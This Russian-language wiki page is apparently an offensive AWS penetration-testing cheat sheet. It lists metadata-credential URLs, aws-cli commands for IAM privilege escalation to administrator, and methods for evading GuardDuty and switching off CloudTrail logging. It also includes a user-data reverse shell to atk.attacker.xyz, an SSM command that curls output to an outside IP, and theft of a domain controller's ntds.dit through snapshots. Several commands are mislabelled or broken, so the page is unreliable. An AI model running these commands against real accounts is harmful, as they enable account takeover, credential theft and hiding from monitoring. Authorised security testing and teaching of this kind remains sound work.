http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

